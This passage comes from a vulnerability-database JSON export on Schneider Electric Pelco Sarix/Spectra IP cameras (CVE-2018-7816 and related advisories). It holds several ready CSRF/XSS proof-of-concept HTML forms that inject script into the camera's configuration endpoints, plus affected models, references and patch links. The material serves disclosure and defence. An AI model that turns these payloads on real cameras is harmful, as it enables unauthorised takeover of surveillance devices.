type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7816",
"trust": 3.0
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-15702",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"id": "VAR-201905-1022",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
}
]
},
"last_update_date": "2023-12-18T12:18:59.416000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGenPelcoSarixEnhancedCamera Permissions and Access Control Issue Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/162301"
},
{
"title": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for permissions and access control issues vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92882"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7816"
},
{
"trust": 1.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7816"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T20:29:00.980000",
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-7816"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced Camera Vulnerabilities related to authorization, permissions, and access control",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
}
],
"trust": 0.6
}
}
VAR-201803-1843
Vulnerability from variot - Updated: 2023-12-18 12:18A vulnerability exists in Schneider Electric's Pelco Sarix Professional in all firmware versions prior to 3.29.67 which could enable SSH service due to lack of authentication for /login/bin/set_param could enable SSH service. Schneider Electric Pelco Sarix Professional Contains an authentication vulnerability.Information may be obtained and information may be altered. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectricPelcoSarixProfessional is a video surveillance device from Schneider Electric, France. A security vulnerability exists in SchneiderElectricPelcoSarixProfessional with firmware prior to 3.29.67, which was caused by a program failing to authenticate to /login/bin/set_param. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1843",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "mps110-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp319-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp1110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp519-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp219-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibps110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp219-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp1110-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp1110-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp219-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp519-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp319-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp1110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp519-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp519-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp319-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp219-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imps110-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp319-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imps110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp1110-1er",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ibps110-1er",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imp1110-1",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imps110-1e",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric pelco sarix professional",
"scope": "lt",
"trust": 0.6,
"vendor": "schneider",
"version": "3.29.67"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
